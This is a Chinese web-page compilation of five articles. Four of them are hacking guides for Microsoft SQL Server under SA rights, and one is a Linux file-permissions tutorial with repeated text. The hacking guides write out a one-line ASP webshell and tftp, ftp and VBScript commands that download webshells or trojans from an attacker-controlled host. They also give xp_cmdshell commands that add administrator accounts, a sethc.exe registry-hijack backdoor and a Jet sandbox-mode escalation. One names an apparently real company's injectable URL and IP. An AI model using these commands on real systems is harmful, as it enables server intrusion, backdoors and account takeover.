SA权限九种上传文件办法(通用5篇)由网友“YeAnn”投稿提供,下面是小编给大家带来SA权限九种上传文件办法,一起来阅读吧,希望对您有所帮助。
篇1:SA权限九种上传文件办法
本文和大家一起讨论SA权限几种上传文件的方法,如果还有别的方法,希望大家提出,技术越辩起明,越明越高,一、NBSI的命令方法:写入一句话木SHELL,命令如下: echo ^<25%execute request(“#”)25%^>>d:\web\mm.asp这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop “服务名”可以停掉服务。
二、NBSI3。0自带文件上传功能,也可以使用。缺点速度慢。建议上传短小的WEBSHELL。
三、把一句话木马与入数据库,然后利用NBSI数据库差异备份功能。
四、如网站有论坛且开放上传附件功能,可直接在论坛上传文件(把WEBSHELL改成可能上传的文件类型,如JPG,GIF)
五、利用NBSI等注入工具,浏览网站数据库连接文件(前提数据库和WEB在一台机器上,可利用IPCNFIG /ALL命令判断)找出SA的连接密码。利用MSSQL自带的事件查询分析器,连数库机器,通过浏览数据库找出后台密码,如果是MD5可利用Update语句进行更改也可利用Insert加入一新用户,不用在爆破MD5,进入后台,寻找上传WEBSHELL方法。
六、tftp命令法: TFTP [-i] host [GET | PUT] source [destination] 首先在自己的机器或已经控制的肉鸡上开TFTP服务,工具:TFTP32.EXE不错。比如:肉鸡IP:192.168.1.1 具有SA权限的机器是192.168.1.2 执行命令: tftp -i 192.168.1.1 get webshell.asp d:\web\webshell.asp 如果成功,就会在192.168.1.2的D盘web 目录下生成文件:webshell.asp
七、ftp方法:前提是有一个可访问的外网FTP空间.命令ECHO命令,前面讲的方法:在目标机器上生成文件ftp.txt
echo open www.ftp.com>ftp.TXT //连接FTP
echo username>>ftp.TXT //输入用户名
echo password>>ftp.TXT //输入密码
echo get webshell.asp d:\web\webshell.asp>>ftp.TXT //执行下载命令
echo bye>>ftp.TXT //退出
ftp -s:ftp.txt //执行FTP.TXT文件中的FTP命令
八、vbs脚本方法:
利用ECHO命令写入文件: get.vbs,内容如下:
On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject(“Microsoft.XMLHTTP”)
xPost.Open “GET”,iRemote,0
xPost.Send()
Set sGet = createObject(“ADODB.Stream”)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2
然后命令行下执行:cscript. get.vbs ip/muma.exe c:\muma.exe
九、start命令法,此方法不常用,但也是一种方法,
start ip/a.html这候a.html文件以及它包括的图片会保存在机器的,如果我们把自己的程序改名为a.jpg嵌套在a.html中这时候可以下载到IE缓存中,
可以利用dir /s a*.jpg进行搜索。如搜索到,可以利用COPY命令复制出来。
篇2:SA权限添加管理员帐号
注入点:www.enzymotec.com/Page.asp cc=0102041102 IP:192.117.122.145 以色列 inurl:asp
具体脚本命令:
1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user jiaozhu jiaozhu /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaozhu /add';--
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
这段命令是通过SQL执行系统命令的
例如:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user jiss 111 /add'
这段命令是通过SQL执行系统命令的
篇3:linux 文件权限Linux
在上面的章节中,我们知道了文件的权限可以用三个八进制数字表示,其实文件的权限应该用四个八进制来表示,不过用 ls -l 命令时,只显示三个罢了。那个没有显示的八进制数字其实是第一个,它用来设定一些特殊权限。这个八进制数字的三个位是: SUID SGID sti
在上面的章节中,我们知道了文件的权限可以用三个八进制数字表示。其实文件的权限应该用四个八进制来表示,不过用 ls -l 命令时,只显示三个罢了。那个没有显示的八进制数字其实是第一个,它用来设定一些特殊权限。这个八进制数字的三个位是:SUID SGID sticky-bit
它们的含义是:
SUID
当设置了
SUID 位的文件被执行时,该文件将以所有者的身份运行,也就是说无论谁来执行这个文件,他都有文件所有者的特权。如果所有者是 root 的话,那么执行人就有超级用户的特权了。这时该位将变成一个安全漏洞,因此不要轻易设置该位。SGID
与上面的内容类似。文件运行时,运行者将具有所属组的特权。
sticky-bit
sticky 位要求操作系统既是在可执行程序退出后,仍要在内存中保留该程序的映象。这样做是为了节省大型程序的启动时间。但是会占用系统资源。因此设置该位,不如把程序写好。
set uid ;set gid;sticky bit区别
每一个文件有所有者及组编号,set uid ;set gid可以改变用户对文件具有的权限:写和执行.
setuid: 在执行时具有文件所有者的权限.
setgid: 设置目录. 一个目录被标上setgid位,此目录下创建的文件继承该目录的属性.
sticky bit: 该位可以理解为防删除位. 设置sticky bit位后,就算用户对目录具有写权限,但也只能添加文件而不能删除文件。
如何设置:
操作这些标志与操作文件权限的命令是一样的, 都是 chmod. 有两种方法来操作,
1) chmod u+s temp -- 为temp文件加上setuid标志. (setuid 只对文件有效,U=用户)
chmod g+s tempdir -- 为tempdir目录加上setgid标志 (setgid 只对目录有效,g=组名)
chmod o+t temp -- 为temp文件加上sticky标志 (sticky只对文件有效)
2) 采用八进制方式. 这一组八进制数字三位的意义如下,
abc
a - setuid位, 如果该位为1, 则表示设置setuid
b - setgid位, 如果该位为1, 则表示设置setgid
c - sticky位, 如果该位为1, 则表示设置sticky
设置后, 可以用 ls -l 来查看. 如果本来在该位上有x, 则这些特殊标志显示为小写字母 (s, s, t). 否则, 显示为大写字母 (S, S, T)
如:
rwsrw-r-- 表示有setuid标志 (rwxrw-r--:rwsrw-r--)
rwxrwsrw- 表示有setgid标志 (rwxrwxrw-:rwxrwsrw-)
rwxrw-rwt 表示有sticky标志 (rwxrw-rwx:rwxrw-rwt)
理解文件权限
所谓的文件权限,是指对文件的访问权限,包括对文件的读、写、删除、执行。Linux 是一个多用户操作系统,它允许多个用户同时登录和工作。因此 Linux 将一个文件或目录与一个用户和组联系起来。请看下面的例子:
drwxr-xr-x 5 root root 1024 Sep 13 03:27 Desktop
与文件权限相关联的是第一、第三、第四个域。第三个域是文件的所有者,第四个域是文件的所属组,而第一个域则限制了文件的访问权限。在这个例子中,文件的所有者是 root,所属的组是 root,文件的访问权限是 drwxr-xr-x。对于文件和目录讲,每个文件和目录都有一组权限标志和它们结合在一起,在上例中就是第一个域中的内容。下面来仔细分析这个域中各个符号的意义:
该域由 10 个字符组成,可以把它们分为四组,具体含义分别是:
d rwx r-x r-x
文件类型 所有者权限标志 组权限标志 其他用户权限标志
其中:
文件类型:第一个字符。由于 Linux 系统对与设备、目录、文件都当作是文件来处理,因此该字符表明此文件的类型,字符与对应的意义如下表:
文件标志
文件类型
例子
-
普通文件
数据文件、
ASCII 纯文本文件、程序d
目录
/bin
b
块设备
/dev/hda(第一个 IDE 硬盘)
c
字符设备
/dev/ttyS1(与 DOS 种的串口 2 等同)
s
套接字
/dev/log
p
命名管道
/dev/initctl(与“|”等同)
l
符号链接
/dev/modem->/dev/ttyS1
权限标志:
对每个文件或目录都有 4 类不同的用户,
每类用户各有一组读、写和执行(搜索)文件的访问权限,这 4 类用户是:
root:系统特权用户类,既 UID = 0 的用户。
owner:拥有文件的用户。
group:共享文件的组访问权限的用户类的用户组名称。
world:不属于上面 3 类的所有其他用户。
作为 root,他们自动拥有了所有文件和目录的全面的读、写和搜索的权限,所以没有必要明确指定他们的权限。其他三类用户则可以在耽搁文件或者目录的基础上别授权或撤消权限。因此对另外三类用户,一共 9 个权限位与之对应,分为 3 组,每组 3 个,分别用 r、w、x 来表示,分别对应 owner、group、world。
权限位对于文件和目录的含义有些许不同。每组 3 个字符对应的含义从左至右的顺序,对于文件来说是:读文件的内容(r)、写数据到文件(w)、做为命令执行该文件(x)。对于目录来说是:读包含在目录中的文件名称(r)、写信息到目录中去(增加和删除索引点的连接)、搜索目录(能用该目录名称作为路径名去访问它所包含的文件或子目录)。具体来说就是:
1. 有只读权限的用户不能用 cd 进入该目录;还必须有执行权限才能进入。
2. 有执行权限的用户只有在知道文件名并拥有该文件的读权限的情况下才可以访问目录下的文件。
3. 必须有读和执行权限才可以使用 ls 列出目录清单,或使用 cd 进入目录。
4. 如用户有目录的写权限,则可以创建、删除或修改目录下的任何文件或子目录,既是该文件或子目录属于其他用户。
修改文件权限
首先讲修改文件的所有权,使用 chown 和 chgrp 命令:
chown new_user file or directory:修改文件或目录的所有者。
chgrp new_group file or directory:修改文件或目录的所属组。
这里需要注意的是:普通用户不能将文件或目录的所有权交与他人,只有 root 有这一权限。但是普通用户有权改变文件或目录的所属组。
由于每类用户的权限都是由 rwx 三位组成,因此可以用三个八进制数字表示文件的访问权。一个八进制数字可以用三个二进制数字表示,那么与其对应,权值为 4 的位对应 r,权值为 2 的位对应 w,权值为 1 的位对应 x。对于一类用户,将这三位与其对应的权值相乘求和,就可以得出对该类用户的访问权限。
改变文件访问权限的命令是 chmod,格式是:
chmod permission file_name
比如 chmod 764 a.txt,它表示对于文件的所有者,具有对该文件读、写、执行的权限。对于文件所属组的用户,拥有读、写的权限。对于其他用户,只有读权限。
这里需要注意的是:文件的创建者是唯一可以修改该文件访问权限的普通用户,另外一个可以修改文件访问权限的用户是 root。
还有一种表示方法,就是用字符串来设定文件访问权限。其中读用 r 表示,写用 w 表示,执行用 x 表示;所有者用 u 表示,组用户用 g 表示,其他用户用 o 表示,所有用户用 a 表示。那么上面例子就写成西面的模样:
chmod a+r,u+w,u+x,g+w a.txt
理解 SUID 和 SGID
在上面的章节中,我们知道了文件的权限可以用三个八进制数字表示。其实文件的权限应该用四个八进制来表示,不过用 ls -l 命令时,只显示三个罢了。那个没有显示的八进制数字其实是第一个,它用来设定一些特殊权限。这个八进制数字的三个位是:
SUID SGID sticky-bit
它们的含义是:
SUID
当设置了
SUID 位的文件被执行时,该文件将以所有者的身份运行,也就是说无论谁来执行这个文件,他都有文件所有者的特权。如果所有者是 root 的话,那么执行人就有超级用户的特权了。这时该位将变成一个安全漏洞,因此不要轻易设置该位。SGID
与上面的内容类似。文件运行时,运行者将具有所属组的特权。
sticky-bit
sticky 位要求操作系统既是在可执行程序退出后,仍要在内存中保留该程序的映象。这样做是为了节省大型程序的启动时间。但是会占用系统资源。因此设置该位,不如把程序写好。
原文转自:www.ltesting.net
篇4:SA权限下映象劫持语句
SA权限下有时不能执行命令,下面给出注册表提权的劫持语句
:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\ Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_SZ','c:\\windows\\explorer.exe'
:exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\ Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe','debugger','REG_SZ','c:\\windows\\system32\\taskmgr.exe'
写注册表函数.
select regwrite(“HKEY_LOCAL_MACHINE”,“SOFTWARE\\ Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe”,“Debugger”,“REG_SZ”,“E:\\web\\170stock\\admin\\include\\explorer.exe”);
通过udf提权加上regwrite这个函数
然后改注册表,把sethc.exe 的路径改成了我们想运行的程序(比如cmd)
然后连3389,按下5次shift就执行我我们的程序,很好,就是sethc后门原理
不过管理组做了手脚,我们加到localgroup administrators的用户进不去3389
篇5:SA权限沙盘模式提权方法
方便自己记忆再写出来,在这种情况下,要执行命令,条件是要有xp_regwrite,
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\ Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(“cmd.exe /c net user cnfjhh fst /add”)')
★ 如何设置一个高容量的Linux POP3服务器服务器教程
【SA权限九种上传文件办法(通用5篇)】相关文章:
Windows 服务器的安全防护林2023-06-15
网络层安全服务与攻击分析2023-12-10
基于分层结构的管理信息系统架构设计探究论文2022-11-06
如何入侵FBI核心网络2023-04-24
信息科工作总结2023-11-29
我的使用说明书 范文2023-10-06
后门750字作文2022-09-01
信息科上半年工作总结范文2023-07-03
活动目录方案2023-03-13
你的任务应该被自动化:活动目录2023-09-10